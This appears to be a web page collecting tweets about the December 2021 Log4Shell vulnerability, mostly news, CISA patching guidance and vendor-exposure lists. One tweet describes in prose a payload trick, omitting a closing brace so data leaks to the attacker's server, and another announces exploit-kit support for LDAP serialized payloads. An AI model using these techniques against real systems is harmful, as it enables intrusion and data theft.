.png "back to home page")
Bloomberg: The first person to alert members of an open-source software project who frantically worked to fix a fatal flaw in a widely used software tool was a cloud-security team employee at Alibaba. https://t.co/zdVeKw6KwG
— Vincent Lee (@Rover829) December 14, 2021
.@timstarks got the inside scoop on CISA's call with industry leaders about #log4j today.
— Tonya Riley (@TonyaJoRiley) December 13, 2021
CISA is expecting hundreds of millions of devices are likely to be affected. Cannot overstate the seriousness of this. https://t.co/31vl3HDsYr
Interesting Log4j payload I discovered, simply omit the closing brace }, and now you will potentially get a bunch of data exfiltrated to your server until the next } appears in that data. Had it work on a FANG target... pic.twitter.com/1aR8yLcTbc
— Tom Anthony (@TomAnthonySEO) December 13, 2021
I have an opinion that I’d love to see become a thing.
— Daniel Cuthbert (@dcuthbert) December 14, 2021
Tech firms pay their damn way. This list, and others, show an entire industry that probably spends more on friggin’ giveaways at cons than supporting devs who build their products with open source tool chains. https://t.co/JyfU2fsp9G
Defenders ? against Log4shell
— Kevin Beaumont (@GossiTheDog) December 14, 2021
I have been working with @CISAgov to produce a validated list of third party products using vulnerable Log4j
✅ find out your exposure and how to fix it
✅ This is work in progress
✅ Bookmark and track situation changeshttps://t.co/iQNJYsRQVC
We’re working closely with our public and private sector partners to address a critical vulnerability affecting the Apache log4j #software library. This vulnerability is being widely exploited by threat actors and presents an urgent challenge to patch: https://t.co/utbcDZBtPv
— Cybersecurity and Infrastructure Security Agency (@CISAgov) December 13, 2021
1/2
“In the frantic time since the flaw was publicly disclosed, researchers have concluded that the vulnerability had existed in #Log4j since September 2013, apparently unknown to its vast universe of users.” #Apache https://t.co/grxNiYUzTU
— Jamie Tarabay (@jamietarabay) December 14, 2021
This is another mitigation people are putting in - but it depends on a recent version of Log4j to work.
— Kevin Beaumont (@GossiTheDog) December 13, 2021
There’s a lot of placebo effect mitigations happening with Log4Shell, sadly. Even some vendors have issued motivations that don’t actually work. https://t.co/6Fv5KzkeYJ
Who would ever think that a tool with such polished branding could be the weak link in the collapse of teh innerwebs?https://t.co/YCX2IymeK7 pic.twitter.com/8max4H5pSQ
— random facts girl (@soychicka) December 14, 2021
If you identify a vendor vulnerable to log4Shell and they are not on this list; make a pull request. You'll save some tears from blue teams and IT all over the world:https://t.co/tWQ9CLkzfP
— Jason Haddix (@Jhaddix) December 14, 2021
Not all heroes wear capes...
CISA recommends 3 immediate actions:
— Cybersecurity and Infrastructure Security Agency (@CISAgov) December 13, 2021
1⃣Enumerate internet-facing endpoints that use Log4j.
2⃣Ensure your #SOC is actioning every alert on devices that fall into the category above.
3⃣Install a web application firewall that automatically updates.
2/2
Hard to overstate the severity of the Apache Log4j vulnerability being exploited across critical and industry systems as we speak.
— Nicole Perlroth (@nicoleperlroth) December 14, 2021
CISA Director @CISAJen “one of the most serious I’ve seen in my entire career, if not the most serious.”
https://t.co/TB6xQFh7Wp
We’re giving @Cloudflare customers the option for us to sanitize their logs to protect from down-stream impacts of the #Log4J vulnerability. https://t.co/hRDkyvnxOA
— Matthew Prince ? (@eastdakota) December 14, 2021
New! Looks like @CISAgov’s #log4j affected software @github repo is up https://t.co/bmntV5ynuI. Useful central compilation of products and guidance.
— Chris Krebs (@C_C_Krebs) December 14, 2021
Good aggregated list of updates from companies and the affect on them from #log4j vulnerability. Exactly the value add that @CISAJen and team should be providing to the world!
— Dmitri Alperovitch (@DAlperovitch) December 14, 2021
Would encourage you to join forces with @GossiTheDog and merge his list in!https://t.co/T8W01PJCdD
We’re seeing over 1,000 attempted exploits of the #Log4J vulnerability per second. Our WAF rules are protecting customers directly, but sanitizing logs helps ensure down-stream log processing isn’t impacted. https://t.co/hRDkyvnxOA
— Matthew Prince ? (@eastdakota) December 14, 2021
Yup. And will uniquely linger like a spore. https://t.co/aAxWcvlSpr
— Matthew Prince ? (@eastdakota) December 14, 2021
I don't care if #Log4J is supposed to be pronounced as Log-Forge...
— Tinker (@TinkerSec) December 14, 2021
...I'm still gonna pronounce it as Log-Four-Jay.
Same way that Nginx is not Engine-Ex, it's En-Ginx (G pronounced like the G in gif).
Earliest evidence we’ve found so far of #Log4J exploit is 2021-12-01 04:36:50 UTC. That suggests it was in the wild at least 9 days before publicly disclosed. However, don’t see evidence of mass exploitation until after public disclosure.
— Matthew Prince ? (@eastdakota) December 11, 2021
Relatedly. I see reports that some sites are seeing as many 100 attempted hacks per minute, across more than 40% of corporate networks. https://t.co/zQPWuSTMPK
— Paul Kedrosky (@pkedrosky) December 14, 2021
What percentage of Java software can’t be patched because the companies that developed it have lost the source code?
— Matthew Green (@matthew_d_green) December 13, 2021
CISA's recently concluded phone briefing with industry on the Log4j vulnerability sounded some pretty dire notes. Here's what Easterly et al told critical infrastructure folk. https://t.co/B8oEWmgp61
— Tim Starks (@timstarks) December 13, 2021
Bad news for web3 enthusiasts, confirmed successful coin miner attacks using the Log4j vulnerability.
— Nicole Perlroth (@nicoleperlroth) December 14, 2021
Attackers are also dropping:
•Khonsari, new ransomware targeting Windows.
•Orcus, a remote access Trojan.
•Reverse bash shells for future attacks.
(Per @Bitdefender) https://t.co/7LWg41mWND
This list is absolutely mind blowing. I knew log4j affected so many things, but seeing is spelled out like this is crazy https://t.co/nzi2Uzhbur
— William Turton (@WilliamTurton) December 14, 2021
Just added support to LDAP Serialized Payloads in the JNDI-Exploit-Kit. This attack path works in *ANY* java version as long the classes used in the Serialized payload are in the application classpath. Do not rely on your java version being up-to-date and update your log4j ASAP! pic.twitter.com/z3B2UolisR
— Márcio Almeida (@marcioalm) December 13, 2021
“Some security issues you get are sort of red herrings,” said Gary Gregory, who has worked on the Apache Software Foundation team that maintains #Log4j for nearly a decade. “But this one was, ‘Oh crap.’ #log4shell https://t.co/YtBIsQGszr
— Sean Kerner (@TechJournalist) December 14, 2021
This is such as bad look for a vendor that keeps time and processes payroll. Kronos hit with ransomware, warns of data breach and 'several week' outage https://t.co/bafTjxcZZQ via @ZDNet & @jgreigj https://t.co/tRVBZzZ5xR and community link. https://t.co/i9h4xOeLIe
— Larry Dignan (@ldignan) December 13, 2021
Translation: We know you're probably already on vacation, but can you pretty please do some bare minimum security before Christmas? https://t.co/a4j2qDdj7v
— Emil Protalinski (@EPro) December 15, 2021
Turns out the entire world did not manage to patch every single Java application on earth over the weekend, so things are still on fire in Java land: https://t.co/6ZAYRVuRwD
— Laurie Voss (@seldo) December 13, 2021
Does anyone know how the log4j bug leaked out? Per @TaliaRinger was reported to the project on 12/6 and then was found in the wild a few days later. Coincidence? Leaked disclosure? Found in the wild?
— Matthew Green (@matthew_d_green) December 13, 2021
What happened?: On Dec. 10th, an acute remote code execution vulnerability was reported in the #Apache logging package Log4j 2 versions 2.14.1. Exploiting this vulnerability allows threat actors to control #java-based web servers and launch #RCE attacks: https://t.co/sE5OvYJrTN pic.twitter.com/c0Gs0Xs0pe
— Check Point Software (@CheckPointSW) December 14, 2021
Mad props to Chen Zhaojun of Alibaba Cloud Security for responsibly disclosing the #log4j vulnerability in private directly to the log4j developers, so that a patch to log4j was released by December 6th, several days before the vulnerability went public.
— Talia Ringer (@TaliaRinger) December 12, 2021
As we were starting to hear over the weekend, updating JVM version is no longer an effective mitigation. Continue focusing on patching the root cause! https://t.co/taSjdTvKA5
— Chris Eng (@chriseng) December 13, 2021
CISA has told federal civilian agencies to patch systems affected by the Log4Shell vulnerability by Christmas Eve https://t.co/n9YtrVgcCq
— The Record by Recorded Future (@TheRecord_Media) December 14, 2021
CISA tells federal agencies to patch Log4Shell before Christmas (by Dec 24, 2021)https://t.co/XTWMdhqTcA pic.twitter.com/1QvhdIyKIN
— Catalin Cimpanu (@campuscodi) December 14, 2021
CISA tells federal agencies to patch Log4Shell before Christmas https://t.co/y9Ef9Tk4xv pic.twitter.com/JokQemF5VI
— Hiram Alejandro (@hiramcoop) December 14, 2021
ICYMI: Google Ads not affected by Log4j 2 vulnerability https://t.co/frcuUFjA2D pic.twitter.com/rdaXtqlQxs
— Barry Schwartz (@rustybrick) December 14, 2021
Google says Google Ads not affected by Log4j 2 vulnerability https://t.co/frcuUFBaUb pic.twitter.com/PNkXvavvUc
— Barry Schwartz (@rustybrick) December 14, 2021
CISA Creates Webpage for Apache Log4j Vulnerability CVE-2021-44228 https://t.co/TdyjE0aEzj @CISAgov
— 780th Military Intelligence Brigade (Cyber) (@780thC) December 14, 2021
#CISA created a webpage called Apache #Log4j Vulnerability Guidance and will actively maintain a community-sourced GitHub repository of publicly available information and vendor-supplied advisories regarding the Log4j flaw. https://t.co/5RllGpaisf
— Lindsey O'Donnell Welch (@LindseyOD123) December 14, 2021
Further to the recent vulnerability announcement https://t.co/0z74LyiOxL
— KAPPTURE (@Kappture1) December 14, 2021
Kappture does not use the 3rd party log4j library in its products. There is no action require by Kappture or any of its clients.#Hospitality #Tech #Security #CISA #log4j pic.twitter.com/O9kNsIqkP7
CISA creates vulnerability guidance webpage for the Apache Log4j vulnerability - CVE-2021-44228 https://t.co/sF2sbHGrqI #CVE #Vulnerability #InfoSec #CyberSecurity @CVEnew
— CVE Announcements (@CVEannounce) December 14, 2021
CISA Creates Webpage for Apache Log4j Vulnerability CVE-2021-44228 | @CISAInfraSec https://t.co/v8Aojqq5t7
— Justin (@xxdesmus) December 14, 2021
#Log4Shell: We Are in So Much Trouble, by @sjvn at @thenewstack https://t.co/Z2fnfQawdn
— Robert Cathey (he/him) (@robertcathey) December 14, 2021
Log4Shell: We Are in so Much Troublehttps://t.co/fFhnj5Mk87 via @thenewstack & @sjvn#Log4Shell may, with no exaggeration, be the worst IT #security problem of our generation. Here's what is and what you can do about it. #log4j
— Steven J. Vaughan-Nichols (@sjvn) December 14, 2021
Attackers Target #log4j to Drop #ransomware, Web Shells, #Backdoors
— ?????? ????????????? (@bamitav) December 15, 2021
https://t.co/KH8HQQ1WNm#100DaysOfCode #bot #CodeNewbie #Developers #bugbounty #CyberAttack #cybersecurity #Security #infosec #OpenSource #Python #javascript #tech #DataSecurity #Malware #hacker #privacy #CISOs